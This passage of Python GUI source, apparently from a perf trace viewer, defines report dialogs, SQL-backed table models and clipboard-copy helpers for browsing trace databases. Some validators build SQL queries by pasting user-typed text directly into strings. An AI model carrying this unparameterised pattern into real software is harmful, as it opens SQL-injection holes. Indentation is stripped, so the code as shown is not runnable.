self.view.setUniformRowHeights(True)
self.view.setSelectionMode(QAbstractItemView.ContiguousSelection)
self.view.CopyCellsToClipboard = CopyTreeCellsToClipboard
self.view.setModel(self.model)
self.ResizeColumnsToContents()
self.context_menu = TreeContextMenu(self.view)
self.find_bar = FindBar(self, self, True)
self.finder = ChildDataItemFinder(self.model.root)
self.fetch_bar = FetchMoreRecordsBar(self.model, self)
self.vbox = VBox(self.view, self.find_bar.Widget(), self.fetch_bar.Widget())
self.setWidget(self.vbox.Widget())
AddSubWindow(glb.mainwindow.mdi_area, self, report_vars.name + " Branch Events")
def ResizeColumnToContents(self, column, n):
# Using the view's resizeColumnToContents() here is extremely slow
# so implement a crude alternative
mm = "MM" if column else "MMMM"
font = self.view.font()
metrics = QFontMetrics(font)
max = 0
for row in xrange(n):
val = self.model.root.child_items[row].data[column]
len = metrics.width(str(val) + mm)
max = len if len > max else max
val = self.model.columnHeader(column)
len = metrics.width(str(val) + mm)
max = len if len > max else max
self.view.setColumnWidth(column, max)
def ResizeColumnsToContents(self):
n = min(self.model.root.child_count, 100)
if n < 1:
# No data yet, so connect a signal to notify when there is
self.model.rowsInserted.connect(self.UpdateColumnWidths)
return
columns = self.model.columnCount()
for i in xrange(columns):
self.ResizeColumnToContents(i, n)
def UpdateColumnWidths(self, *x):
# This only needs to be done once, so disconnect the signal now
self.model.rowsInserted.disconnect(self.UpdateColumnWidths)
self.ResizeColumnsToContents()
def Find(self, value, direction, pattern, context):
self.view.setFocus()
self.find_bar.Busy()
self.finder.Find(value, direction, pattern, context, self.FindDone)
def FindDone(self, row):
self.find_bar.Idle()
if row >= 0:
self.view.setCurrentIndex(self.model.index(row, 0, QModelIndex()))
else:
self.find_bar.NotFound()
# Line edit data item
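# Base class for the report dialog fields.  Editing the text marks the item
# invalid; when editing finishes (or Ok is pressed) Validate() calls the
# subclass's DoValidate(), which converts the text into a SQL fragment stored
# in self.value.  Bad input turns the text red and reports the error through
# the parent dialog's ShowMessage().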
class LineEditDataItem(object):
def __init__(self, glb, label, placeholder_text, parent, id = "", default = ""):
self.glb = glb
self.label = label
self.placeholder_text = placeholder_text
self.parent = parent
self.id = id
self.value = default
self.widget = QLineEdit(default)
self.widget.editingFinished.connect(self.Validate)
self.widget.textChanged.connect(self.Invalidate)
self.red = False
self.error = ""
self.validated = True
if placeholder_text:
self.widget.setPlaceholderText(placeholder_text)
def TurnTextRed(self):
if not self.red:
palette = QPalette()
palette.setColor(QPalette.Text,Qt.red)
self.widget.setPalette(palette)
self.red = True
def TurnTextNormal(self):
if self.red:
palette = QPalette()
self.widget.setPalette(palette)
self.red = False
def InvalidValue(self, value):
self.value = ""
self.TurnTextRed()
self.error = self.label + " invalid value '" + value + "'"
self.parent.ShowMessage(self.error)
def Invalidate(self):
self.validated = False
def DoValidate(self, input_string):
self.value = input_string.strip()
def Validate(self):
self.validated = True
self.error = ""
self.TurnTextNormal()
self.parent.ClearMessage()
input_string = self.widget.text()
if not len(input_string.strip()):
self.value = ""
return
self.DoValidate(input_string)
def IsValid(self):
if not self.validated:
self.Validate()
if len(self.error):
self.parent.ShowMessage(self.error)
return False
return True
def IsNumber(self, value):
try:
x = int(value)
except:
x = 0
return str(x) == value
# Non-negative integer ranges dialog data item
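# Accepts comma-separated non-negative integers and ranges, e.g. "0,5-6",
# and turns them into a SQL condition for the given column, such as
# "(cpu >= 5 AND cpu <= 6) OR cpu IN (0)".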
class NonNegativeIntegerRangesDataItem(LineEditDataItem):
def __init__(self, glb, label, placeholder_text, column_name, parent):
super(NonNegativeIntegerRangesDataItem, self).__init__(glb, label, placeholder_text, parent)
self.column_name = column_name
def DoValidate(self, input_string):
singles = []
ranges = []
for value in [x.strip() for x in input_string.split(",")]:
if "-" in value:
vrange = value.split("-")
if len(vrange) != 2 or not self.IsNumber(vrange[0]) or not self.IsNumber(vrange[1]):
return self.InvalidValue(value)
ranges.append(vrange)
else:
if not self.IsNumber(value):
return self.InvalidValue(value)
singles.append(value)
ranges = [("(" + self.column_name + " >= " + r[0] + " AND " + self.column_name + " <= " + r[1] + ")") for r in ranges]
if len(singles):
ranges.append(self.column_name + " IN (" + ",".join(singles) + ")")
self.value = " OR ".join(ranges)
# Positive integer dialog data item
class PositiveIntegerDataItem(LineEditDataItem):
def __init__(self, glb, label, placeholder_text, parent, id = "", default = ""):
super(PositiveIntegerDataItem, self).__init__(glb, label, placeholder_text, parent, id, default)
def DoValidate(self, input_string):
if not self.IsNumber(input_string.strip()):
return self.InvalidValue(input_string)
value = int(input_string.strip())
if value <= 0:
return self.InvalidValue(input_string)
self.value = str(value)
# Dialog data item converted and validated using a SQL table
class SQLTableDataItem(LineEditDataItem):
def __init__(self, glb, label, placeholder_text, table_name, match_column, column_name1, column_name2, parent):
super(SQLTableDataItem, self).__init__(glb, label, placeholder_text, parent)
self.table_name = table_name
self.match_column = match_column
self.column_name1 = column_name1
self.column_name2 = column_name2
def ValueToIds(self, value):
ids = []
query = QSqlQuery(self.glb.db)
stmt = "SELECT id FROM " + self.table_name + " WHERE " + self.match_column + " = '" + value + "'"
ret = query.exec_(stmt)
if ret:
while query.next():
ids.append(str(query.value(0)))
return ids
def DoValidate(self, input_string):
all_ids = []
for value in [x.strip() for x in input_string.split(",")]:
ids = self.ValueToIds(value)
if len(ids):
all_ids.extend(ids)
else:
return self.InvalidValue(value)
self.value = self.column_name1 + " IN (" + ",".join(all_ids) + ")"
if self.column_name2:
self.value = "( " + self.value + " OR " + self.column_name2 + " IN (" + ",".join(all_ids) + ") )"
# Sample time ranges dialog data item converted and validated using 'samples' SQL table
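# Time ranges are validated against the samples table: the first and last
# sample times are read up front, and each requested range is converted to a
# range of sample ids by binary search (BinarySearchTime) because the WHERE
# clause is built on samples.id.  Bounds may be omitted (meaning start or end
# of trace), given as relative values with an ms/us/ns suffix, or given as
# negative values, which are taken relative to the end of the trace.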
class SampleTimeRangesDataItem(LineEditDataItem):
def __init__(self, glb, label, placeholder_text, column_name, parent):
self.column_name = column_name
self.last_id = 0
self.first_time = 0
self.last_time = 2 ** 64
query = QSqlQuery(glb.db)
QueryExec(query, "SELECT id, time FROM samples ORDER BY id DESC LIMIT 1")
if query.next():
self.last_id = int(query.value(0))
self.last_time = int(query.value(1))
QueryExec(query, "SELECT time FROM samples WHERE time != 0 ORDER BY id LIMIT 1")
if query.next():
self.first_time = int(query.value(0))
if placeholder_text:
placeholder_text += ", between " + str(self.first_time) + " and " + str(self.last_time)
super(SampleTimeRangesDataItem, self).__init__(glb, label, placeholder_text, parent)
def IdBetween(self, query, lower_id, higher_id, order):
QueryExec(query, "SELECT id FROM samples WHERE id > " + str(lower_id) + " AND id < " + str(higher_id) + " ORDER BY id " + order + " LIMIT 1")
if query.next():
return True, int(query.value(0))
else:
return False, 0
def BinarySearchTime(self, lower_id, higher_id, target_time, get_floor):
query = QSqlQuery(self.glb.db)
while True:
next_id = int((lower_id + higher_id) / 2)
QueryExec(query, "SELECT time FROM samples WHERE id = " + str(next_id))
if not query.next():
ok, dbid = self.IdBetween(query, lower_id, next_id, "DESC")
if not ok:
ok, dbid = self.IdBetween(query, next_id, higher_id, "")
if not ok:
return str(higher_id)
next_id = dbid
QueryExec(query, "SELECT time FROM samples WHERE id = " + str(next_id))
next_time = int(query.value(0))
if get_floor:
if target_time > next_time:
lower_id = next_id
else:
higher_id = next_id
if higher_id <= lower_id + 1:
return str(higher_id)
else:
if target_time >= next_time:
lower_id = next_id
else:
higher_id = next_id
if higher_id <= lower_id + 1:
return str(lower_id)
def ConvertRelativeTime(self, val):
mult = 1
suffix = val[-2:]
if suffix == "ms":
mult = 1000000
elif suffix == "us":
mult = 1000
elif suffix == "ns":
mult = 1
else:
return val
val = val[:-2].strip()
if not self.IsNumber(val):
return val
val = int(val) * mult
if val >= 0:
val += self.first_time
else:
val += self.last_time
return str(val)
def ConvertTimeRange(self, vrange):
if vrange[0] == "":
vrange[0] = str(self.first_time)
if vrange[1] == "":
vrange[1] = str(self.last_time)
vrange[0] = self.ConvertRelativeTime(vrange[0])
vrange[1] = self.ConvertRelativeTime(vrange[1])
if not self.IsNumber(vrange[0]) or not self.IsNumber(vrange[1]):
return False
beg_range = max(int(vrange[0]), self.first_time)
end_range = min(int(vrange[1]), self.last_time)
if beg_range > self.last_time or end_range < self.first_time:
return False
vrange[0] = self.BinarySearchTime(0, self.last_id, beg_range, True)
vrange[1] = self.BinarySearchTime(1, self.last_id + 1, end_range, False)
return True
def AddTimeRange(self, value, ranges):
n = value.count("-")
if n == 1:
pass
elif n == 2:
if value.split("-")[1].strip() == "":
n = 1
elif n == 3:
n = 2
else:
return False
pos = findnth(value, "-", n)
vrange = [value[:pos].strip() ,value[pos+1:].strip()]
if self.ConvertTimeRange(vrange):
ranges.append(vrange)
return True
return False
def DoValidate(self, input_string):
ranges = []
for value in [x.strip() for x in input_string.split(",")]:
if not self.AddTimeRange(value, ranges):
return self.InvalidValue(value)
ranges = [("(" + self.column_name + " >= " + r[0] + " AND " + self.column_name + " <= " + r[1] + ")") for r in ranges]
self.value = " OR ".join(ranges)
# Report Dialog Base
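# Base dialog for report creation.  Ok() gathers the data items into a
# ReportVars: the REPORTNAME item becomes the window name (and is required),
# a LIMIT item becomes the record limit, and the remaining non-empty values
# are AND'ed together.  With 'partial' the result is wrapped as
# " AND ( ... ) " for appending to an existing WHERE clause, otherwise a
# full " WHERE ... " clause is produced.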
class ReportDialogBase(QDialog):
def __init__(self, glb, title, items, partial, parent=None):
super(ReportDialogBase, self).__init__(parent)
self.glb = glb
self.report_vars = ReportVars()
self.setWindowTitle(title)
self.setMinimumWidth(600)
self.data_items = [x(glb, self) for x in items]
self.partial = partial
self.grid = QGridLayout()
for row in xrange(len(self.data_items)):
self.grid.addWidget(QLabel(self.data_items[row].label), row, 0)
self.grid.addWidget(self.data_items[row].widget, row, 1)
self.status = QLabel()
self.ok_button = QPushButton("Ok", self)
self.ok_button.setDefault(True)
self.ok_button.released.connect(self.Ok)
self.ok_button.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
self.cancel_button = QPushButton("Cancel", self)
self.cancel_button.released.connect(self.reject)
self.cancel_button.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
self.hbox = QHBoxLayout()
#self.hbox.addStretch()
self.hbox.addWidget(self.status)
self.hbox.addWidget(self.ok_button)
self.hbox.addWidget(self.cancel_button)
self.vbox = QVBoxLayout()
self.vbox.addLayout(self.grid)
self.vbox.addLayout(self.hbox)
self.setLayout(self.vbox);
def Ok(self):
vars = self.report_vars
for d in self.data_items:
if d.id == "REPORTNAME":
vars.name = d.value
if not vars.name:
self.ShowMessage("Report name is required")
return
for d in self.data_items:
if not d.IsValid():
return
for d in self.data_items[1:]:
if d.id == "LIMIT":
vars.limit = d.value
elif len(d.value):
if len(vars.where_clause):
vars.where_clause += " AND "
vars.where_clause += d.value
if len(vars.where_clause):
if self.partial:
vars.where_clause = " AND ( " + vars.where_clause + " ) "
else:
vars.where_clause = " WHERE " + vars.where_clause + " "
self.accept()
def ShowMessage(self, msg):
self.status.setText("<font color=#FF0000>" + msg)
def ClearMessage(self):
self.status.setText("")
# Selected branch report creation dialog
class SelectedBranchDialog(ReportDialogBase):
def __init__(self, glb, parent=None):
title = "Selected Branches"
items = (lambda g, p: LineEditDataItem(g, "Report name:", "Enter a name to appear in the window title bar", p, "REPORTNAME"),
lambda g, p: SampleTimeRangesDataItem(g, "Time ranges:", "Enter time ranges", "samples.id", p),
lambda g, p: NonNegativeIntegerRangesDataItem(g, "CPUs:", "Enter CPUs or ranges e.g. 0,5-6", "cpu", p),
lambda g, p: SQLTableDataItem(g, "Commands:", "Only branches with these commands will be included", "comms", "comm", "comm_id", "", p),
lambda g, p: SQLTableDataItem(g, "PIDs:", "Only branches with these process IDs will be included", "threads", "pid", "thread_id", "", p),
lambda g, p: SQLTableDataItem(g, "TIDs:", "Only branches with these thread IDs will be included", "threads", "tid", "thread_id", "", p),
lambda g, p: SQLTableDataItem(g, "DSOs:", "Only branches with these DSOs will be included", "dsos", "short_name", "samples.dso_id", "to_dso_id", p),
lambda g, p: SQLTableDataItem(g, "Symbols:", "Only branches with these symbols will be included", "symbols", "name", "symbol_id", "to_symbol_id", p),
lambda g, p: LineEditDataItem(g, "Raw SQL clause: ", "Enter a raw SQL WHERE clause", p))
super(SelectedBranchDialog, self).__init__(glb, title, items, True, parent)
# Event list
def GetEventList(db):
events = []
query = QSqlQuery(db)
QueryExec(query, "SELECT name FROM selected_events WHERE id > 0 ORDER BY id")
while query.next():
events.append(query.value(0))
return events
# Is a table selectable
def IsSelectable(db, table, sql = ""):
query = QSqlQuery(db)
try:
QueryExec(query, "SELECT * FROM " + table + " " + sql + " LIMIT 1")
except:
return False
return True
# SQL table data model item
class SQLTableItem():
def __init__(self, row, data):
self.row = row
self.data = data
def getData(self, column):
return self.data[column]
# SQL table data model
class SQLTableModel(TableModel):
progress = Signal(object)
def __init__(self, glb, sql, column_headers, parent=None):
super(SQLTableModel, self).__init__(parent)
self.glb = glb
self.more = True
self.populated = 0
self.column_headers = column_headers
self.fetcher = SQLFetcher(glb, sql, lambda x, y=len(column_headers): self.SQLTableDataPrep(x, y), self.AddSample)
self.fetcher.done.connect(self.Update)
self.fetcher.Fetch(glb_chunk_sz)
def DisplayData(self, item, index):
self.FetchIfNeeded(item.row)
return item.getData(index.column())
def AddSample(self, data):
child = SQLTableItem(self.populated, data)
self.child_items.append(child)
self.populated += 1
def Update(self, fetched):
if not fetched:
self.more = False
self.progress.emit(0)
child_count = self.child_count
count = self.populated - child_count
if count > 0:
parent = QModelIndex()
self.beginInsertRows(parent, child_count, child_count + count - 1)
self.insertRows(child_count, count, parent)
self.child_count += count
self.endInsertRows()
self.progress.emit(self.child_count)
def FetchMoreRecords(self, count):
current = self.child_count
if self.more:
self.fetcher.Fetch(count)
else:
self.progress.emit(0)
return current
def HasMoreRecords(self):
return self.more
def columnCount(self, parent=None):
return len(self.column_headers)
def columnHeader(self, column):
return self.column_headers[column]
def SQLTableDataPrep(self, query, count):
data = []
for i in xrange(count):
data.append(query.value(i))
return data
# SQL automatic table data model
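# Displays an arbitrary table or view.  Column names are discovered with
# "PRAGMA table_info()" on SQLite or from information_schema.columns on
# PostgreSQL, and rows are fetched in id order using the same $$last_id$$
# scheme as above (comm_id for comm_threads_view; meta tables such as
# sqlite_master and information_schema.* are fetched with a plain SELECT).
# The samples and samples_view tables get a special prep step under PySide
# version 1 on Python 3 to format the time column as a string.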
class SQLAutoTableModel(SQLTableModel):
def __init__(self, glb, table_name, parent=None):
sql = "SELECT * FROM " + table_name + " WHERE id > $$last_id$$ ORDER BY id LIMIT " + str(glb_chunk_sz)
if table_name == "comm_threads_view":
# For now, comm_threads_view has no id column
sql = "SELECT * FROM " + table_name + " WHERE comm_id > $$last_id$$ ORDER BY comm_id LIMIT " + str(glb_chunk_sz)
column_headers = []
query = QSqlQuery(glb.db)
if glb.dbref.is_sqlite3:
QueryExec(query, "PRAGMA table_info(" + table_name + ")")
while query.next():
column_headers.append(query.value(1))
if table_name == "sqlite_master":
sql = "SELECT * FROM " + table_name
else:
if table_name[:19] == "information_schema.":
sql = "SELECT * FROM " + table_name
select_table_name = table_name[19:]
schema = "information_schema"
else:
select_table_name = table_name
schema = "public"
QueryExec(query, "SELECT column_name FROM information_schema.columns WHERE table_schema = '" + schema + "' and table_name = '" + select_table_name + "'")
while query.next():
column_headers.append(query.value(0))
if pyside_version_1 and sys.version_info[0] == 3:
if table_name == "samples_view":
self.SQLTableDataPrep = self.samples_view_DataPrep
if table_name == "samples":
self.SQLTableDataPrep = self.samples_DataPrep
super(SQLAutoTableModel, self).__init__(glb, sql, column_headers, parent)
def samples_view_DataPrep(self, query, count):
data = []
data.append(query.value(0))
# Workaround pyside failing to handle large integers (i.e. time) in python3 by converting to a string
data.append("{:>19}".format(query.value(1)))
for i in xrange(2, count):
data.append(query.value(i))
return data
def samples_DataPrep(self, query, count):
data = []
for i in xrange(9):
data.append(query.value(i))
# Workaround pyside failing to handle large integers (i.e. time) in python3 by converting to a string
data.append("{:>19}".format(query.value(9)))
for i in xrange(10, count):
data.append(query.value(i))
return data
# Base class for custom ResizeColumnsToContents
class ResizeColumnsToContentsBase(QObject):
def __init__(self, parent=None):
super(ResizeColumnsToContentsBase, self).__init__(parent)
def ResizeColumnToContents(self, column, n):
# Using the view's resizeColumnToContents() here is extremely slow
# so implement a crude alternative
font = self.view.font()
metrics = QFontMetrics(font)
max = 0
for row in xrange(n):
val = self.data_model.child_items[row].data[column]
len = metrics.width(str(val) + "MM")
max = len if len > max else max
val = self.data_model.columnHeader(column)
len = metrics.width(str(val) + "MM")
max = len if len > max else max
self.view.setColumnWidth(column, max)
def ResizeColumnsToContents(self):
n = min(self.data_model.child_count, 100)
if n < 1:
# No data yet, so connect a signal to notify when there is
self.data_model.rowsInserted.connect(self.UpdateColumnWidths)
return
columns = self.data_model.columnCount()
for i in xrange(columns):
self.ResizeColumnToContents(i, n)
def UpdateColumnWidths(self, *x):
# This only needs to be done once, so disconnect the signal now
self.data_model.rowsInserted.disconnect(self.UpdateColumnWidths)
self.ResizeColumnsToContents()
# Convert value to CSV
def ToCSValue(val):
if '"' in val:
val = val.replace('"', '""')
if "," in val or '"' in val:
val = '"' + val + '"'
return val
# Key to sort table model indexes by row / column, assuming fewer than 1000 columns
glb_max_cols = 1000
def RowColumnKey(a):
return a.row() * glb_max_cols + a.column()
# Copy selected table cells to clipboard
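# Copies the selected cells either as CSV (with ToCSValue() quoting) or as
# plain text padded to per-column maximum widths, right-justifying columns
# whose alignment role is AlignRight.  with_hdr adds a header row, but is
# ignored when only a single cell is selected.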
def CopyTableCellsToClipboard(view, as_csv=False, with_hdr=False):
indexes = sorted(view.selectedIndexes(), key=RowColumnKey)
idx_cnt = len(indexes)
if not idx_cnt:
return
if idx_cnt == 1:
with_hdr=False
min_row = indexes[0].row()
max_row = indexes[0].row()
min_col = indexes[0].column()
max_col = indexes[0].column()
for i in indexes:
min_row = min(min_row, i.row())
max_row = max(max_row, i.row())
min_col = min(min_col, i.column())
max_col = max(max_col, i.column())
if max_col > glb_max_cols:
raise RuntimeError("glb_max_cols is too low")
max_width = [0] * (1 + max_col - min_col)
for i in indexes:
c = i.column() - min_col
max_width[c] = max(max_width[c], len(str(i.data())))
text = ""
pad = ""
sep = ""
if with_hdr:
model = indexes[0].model()
for col in range(min_col, max_col + 1):
val = model.headerData(col, Qt.Horizontal)
if as_csv:
text += sep + ToCSValue(val)
sep = ","
else:
c = col - min_col
max_width[c] = max(max_width[c], len(val))
width = max_width[c]
align = model.headerData(col, Qt.Horizontal, Qt.TextAlignmentRole)
if align & Qt.AlignRight:
val = val.rjust(width)
text += pad + sep + val
pad = " " * (width - len(val))
sep = " "
text += "\n"
pad = ""
sep = ""
last_row = min_row
for i in indexes:
if i.row() > last_row:
last_row = i.row()
text += "\n"
pad = ""
sep = ""
if as_csv:
text += sep + ToCSValue(str(i.data()))
sep = ","
else:
width = max_width[i.column() - min_col]
if i.data(Qt.TextAlignmentRole) & Qt.AlignRight:
val = str(i.data()).rjust(width)
else:
val = str(i.data())
text += pad + sep + val
pad = " " * (width - len(val))
sep = " "
QApplication.clipboard().setText(text)
def CopyTreeCellsToClipboard(view, as_csv=False, with_hdr=False):
indexes = view.selectedIndexes()
if not len(indexes):
return
selection = view.selectionModel()
first = None
for i in indexes:
above = view.indexAbove(i)
if not selection.isSelected(above):
first = i
break
if first is None:
raise RuntimeError("CopyTreeCellsToClipboard internal error")
model = first.model()
row_cnt = 0
col_cnt = model.columnCount(first)
max_width = [0] * col_cnt
indent_sz = 2
indent_str = " " * indent_sz
expanded_mark_sz = 2
if sys.version_info[0] == 3:
expanded_mark = "\u25BC "
not_expanded_mark = "\u25B6 "
else:
expanded_mark = unicode(chr(0xE2) + chr(0x96) + chr(0xBC) + " ", "utf-8")
not_expanded_mark = unicode(chr(0xE2) + chr(0x96) + chr(0xB6) + " ", "utf-8")
leaf_mark = " "
if not as_csv:
pos = first
while True:
row_cnt += 1
row = pos.row()
for c in range(col_cnt):
i = pos.sibling(row, c)
if c:
n = len(str(i.data()))
else:
n = len(str(i.data()).strip())
n += (i.internalPointer().level - 1) * indent_sz
n += expanded_mark_sz
max_width[c] = max(max_width[c], n)
pos = view.indexBelow(pos)
if not selection.isSelected(pos):
break
text = ""
pad = ""
sep = ""
if with_hdr:
for c in range(col_cnt):
val = model.headerData(c, Qt.Horizontal, Qt.DisplayRole).strip()
if as_csv:
text += sep + ToCSValue(val)
sep = ","
else:
max_width[c] = max(max_width[c], len(val))
width = max_width[c]
align = model.headerData(c, Qt.Horizontal, Qt.TextAlignmentRole)
if align & Qt.AlignRight:
val = val.rjust(width)
text += pad + sep + val
pad = " " * (width - len(val))
sep = " "
text += "\n"
pad = ""
sep = ""
pos = first
while True:
row = pos.row()
for c in range(col_cnt):
i = pos.sibling(row, c)
val = str(i.data())
if not c:
if model.hasChildren(i):
if view.isExpanded(i):
mark = expanded_mark
else:
mark = not_expanded_mark
else:
mark = leaf_mark
val = indent_str * (i.internalPointer().level - 1) + mark + val.strip()
if as_csv:
text += sep + ToCSValue(val)
sep = ","
else:
width = max_width[c]
if c and i.data(Qt.TextAlignmentRole) & Qt.AlignRight:
val = val.rjust(width)
text += pad + sep + val
pad = " " * (width - len(val))
sep = " "
pos = view.indexBelow(pos)
if not selection.isSelected(pos):
break
text = text.rstrip() + "\n"
pad = ""
sep = ""
QApplication.clipboard().setText(text)
def CopyCellsToClipboard(view, as_csv=False, with_hdr=False):
view.CopyCellsToClipboard(view, as_csv, with_hdr)
def CopyCellsToClipboardHdr(view):
CopyCellsToClipboard(view, False, True)
def CopyCellsToClipboardCSV(view):
CopyCellsToClipboard(view, True, True)
# Context menu
class ContextMenu(object):
def __init__(self, view):
self.view = view
self.view.setContextMenuPolicy(Qt.CustomContextMenu)
self.view.customContextMenuRequested.connect(self.ShowContextMenu)
def ShowContextMenu(self, pos):
menu = QMenu(self.view)
self.AddActions(menu)
menu.exec_(self.view.mapToGlobal(pos))
def AddCopy(self, menu):
menu.addAction(CreateAction("&Copy selection", "Copy to clipboard", lambda: CopyCellsToClipboardHdr(self.view), self.view))
menu.addAction(CreateAction("Copy selection as CS&V", "Copy to clipboard as CSV", lambda: CopyCellsToClipboardCSV(self.view), self.view))
def AddActions(self, menu):
self.AddCopy(menu)
class TreeContextMenu(ContextMenu):
def __init__(self, view):
super(TreeContextMenu, self).__init__(view)
def AddActions(self, menu):
i = self.view.currentIndex()
text = str(i.data()).strip()
if len(text):
menu.addAction(CreateAction('Copy "' + text + '"', "Copy to clipboard", lambda: QApplication.clipboard().setText(text), self.view))
self.AddCopy(menu)
# Table window
class TableWindow(QMdiSubWindow, ResizeColumnsToContentsBase):
def __init__(self, glb, table_name, parent=None):
super(TableWindow, self).__init__(parent)
self.data_model = LookupCreateModel(table_name + " Table", lambda: SQLAutoTableModel(glb, table_name))
self.model = QSortFilterProxyModel()
self.model.setSourceModel(self.data_model)
self.view = QTableView()
self.view.setModel(self.model)
self.view.setEditTriggers(QAbstractItemView.NoEditTriggers)
self.view.verticalHeader().setVisible(False)
self.view.sortByColumn(-1, Qt.AscendingOrder)
self.view.setSortingEnabled(True)
self.view.setSelectionMode(QAbstractItemView.ContiguousSelection)
self.view.CopyCellsToClipboard = CopyTableCellsToClipboard
self.ResizeColumnsToContents()
self.context_menu = ContextMenu(self.view)
self.find_bar = FindBar(self, self, True)
self.finder = ChildDataItemFinder(self.data_model)
self.fetch_bar = FetchMoreRecordsBar(self.data_model, self)
self.vbox = VBox(self.view, self.find_bar.Widget(), self.fetch_bar.Widget())
self.setWidget(self.vbox.Widget())
AddSubWindow(glb.mainwindow.mdi_area, self, table_name + " Table")
def Find(self, value, direction, pattern, context):
self.view.setFocus()
self.find_bar.Busy()
self.finder.Find(value, direction, pattern, context, self.FindDone)
def FindDone(self, row):
self.find_bar.Idle()
if row >= 0:
self.view.setCurrentIndex(self.model.mapFromSource(self.data_model.index(row, 0, QModelIndex())))
else:
self.find_bar.NotFound()
# Table list
def GetTableList(glb):
tables = []
query = QSqlQuery(glb.db)
if glb.dbref.is_sqlite3:
QueryExec(query, "SELECT name FROM sqlite_master WHERE type IN ( 'table' , 'view' ) ORDER BY name")
else:
QueryExec(query, "SELECT table_name FROM information_schema.tables WHERE table_schema = 'public' AND table_type IN ( 'BASE TABLE' , 'VIEW' ) ORDER BY table_name")
while query.next():
tables.append(query.value(0))
if glb.dbref.is_sqlite3:
tables.append("sqlite_master")
else:
tables.append("information_schema.tables")
tables.append("information_schema.views")
tables.append("information_schema.columns")
return tables
# Top Calls data model
class TopCallsModel(SQLTableModel):
def __init__(self, glb, report_vars, parent=None):
text = ""
if not glb.dbref.is_sqlite3:
text = "::text"
limit = ""
if len(report_vars.limit):
limit = " LIMIT " + report_vars.limit
sql = ("SELECT comm, pid, tid, name,"
" CASE"
" WHEN (short_name = '[kernel.kallsyms]') THEN '[kernel]'" + text +
" ELSE short_name"
" END AS dso,"
" call_time, return_time, (return_time - call_time) AS elapsed_time, branch_count, "
" CASE"
" WHEN (calls.flags = 1) THEN 'no call'" + text +
" WHEN (calls.flags = 2) THEN 'no return'" + text +
" WHEN (calls.flags = 3) THEN 'no call/return'" + text +
" ELSE ''" + text +
" END AS flags"
" FROM calls"
" INNER JOIN call_paths ON calls.call_path_id = call_paths.id"
" INNER JOIN symbols ON call_paths.symbol_id = symbols.id"
" INNER JOIN dsos ON symbols.dso_id = dsos.id"
" INNER JOIN comms ON calls.comm_id = comms.id"
" INNER JOIN threads ON calls.thread_id = threads.id" +
report_vars.where_clause +
" ORDER BY elapsed_time DESC" +
limit
)
column_headers = ("Command", "PID", "TID", "Symbol", "Object", "Call Time", "Return Time", "Elapsed Time (ns)", "Branch Count", "Flags")
self.alignment = (Qt.AlignLeft, Qt.AlignLeft, Qt.AlignLeft, Qt.AlignLeft, Qt.AlignLeft, Qt.AlignLeft, Qt.AlignLeft, Qt.AlignRight, Qt.AlignRight, Qt.AlignLeft)
super(TopCallsModel, self).__init__(glb, sql, column_headers, parent)
def columnAlignment(self, column):
return self.alignment[column]
# Top Calls report creation dialog
class TopCallsDialog(ReportDialogBase):
def __init__(self, glb, parent=None):
title = "Top Calls by Elapsed Time"
items = (lambda g, p: LineEditDataItem(g, "Report name:", "Enter a name to appear in the window title bar", p, "REPORTNAME"),
lambda g, p: SQLTableDataItem(g, "Commands:", "Only calls with these commands will be included", "comms", "comm", "comm_id", "", p),
lambda g, p: SQLTableDataItem(g, "PIDs:", "Only calls with these process IDs will be included", "threads", "pid", "thread_id", "", p),
lambda g, p: SQLTableDataItem(g, "TIDs:", "Only calls with these thread IDs will be included", "threads", "tid", "thread_id", "", p),
lambda g, p: SQLTableDataItem(g, "DSOs:", "Only calls with these DSOs will be included", "dsos", "short_name", "dso_id", "", p),
lambda g, p: SQLTableDataItem(g, "Symbols:", "Only calls with these symbols will be included", "symbols", "name", "symbol_id", "", p),
lambda g, p: LineEditDataItem(g, "Raw SQL clause: ", "Enter a raw SQL WHERE clause", p),
lambda g, p: PositiveIntegerDataItem(g, "Record limit:", "Limit selection to this number of records", p, "LIMIT", "100"))
super(TopCallsDialog, self).__init__(glb, title, items, False, parent)
# Top Calls window
class TopCallsWindow(QMdiSubWindow, ResizeColumnsToContentsBase):
def __init__(self, glb, report_vars, parent=None):
super(TopCallsWindow, self).__init__(parent)
self.data_model = LookupCreateModel("Top Calls " + report_vars.UniqueId(), lambda: TopCallsModel(glb, report_vars))
self.model = self.data_model
self.view = QTableView()
self.view.setModel(self.model)
self.view.setEditTriggers(QAbstractItemView.NoEditTriggers)
self.view.verticalHeader().setVisible(False)
self.view.setSelectionMode(QAbstractItemView.ContiguousSelection)
self.view.CopyCellsToClipboard = CopyTableCellsToClipboard
self.context_menu = ContextMenu(self.view)
self.ResizeColumnsToContents()
self.find_bar = FindBar(self, self, True)
self.finder = ChildDataItemFinder(self.model)
self.fetch_bar = FetchMoreRecordsBar(self.data_model, self)
self.vbox = VBox(self.view, self.find_bar.Widget(), self.fetch_bar.Widget())
self.setWidget(self.vbox.Widget())
AddSubWindow(glb.mainwindow.mdi_area, self, report_vars.name)
def Find(self, value, direction, pattern, context):
self.view.setFocus()
self.find_bar.Busy()
self.finder.Find(value, direction, pattern, context, self.FindDone)
def FindDone(self, row):
self.find_bar.Idle()
if row >= 0:
self.view.setCurrentIndex(self.model.index(row, 0, QModelIndex()))
else:
self.find_bar.NotFound()
# Action Definition
def CreateAction(label, tip, callback, parent=None, shortcut=None):
action = QAction(label, parent)
if shortcut != None:
action.setShortcuts(shortcut)
action.setStatusTip(tip)
action.triggered.connect(callback)
return action
# Typical application actions
def CreateExitAction(app, parent=None):
return CreateAction("&Quit", "Exit the application", app.closeAllWindows, parent, QKeySequence.Quit)
# Typical MDI actions
def CreateCloseActiveWindowAction(mdi_area):
return CreateAction("Cl&ose", "Close the active window", mdi_area.closeActiveSubWindow, mdi_area)
def CreateCloseAllWindowsAction(mdi_area):
return CreateAction("Close &All", "Close all the windows", mdi_area.closeAllSubWindows, mdi_area)
def CreateTileWindowsAction(mdi_area):
return CreateAction("&Tile", "Tile the windows", mdi_area.tileSubWindows, mdi_area)
def CreateCascadeWindowsAction(mdi_area):
return CreateAction("&Cascade", "Cascade the windows", mdi_area.cascadeSubWindows, mdi_area)
def CreateNextWindowAction(mdi_area):
return CreateAction("Ne&xt", "Move the focus to the next window", mdi_area.activateNextSubWindow, mdi_area, QKeySequence.NextChild)
def CreatePreviousWindowAction(mdi_area):
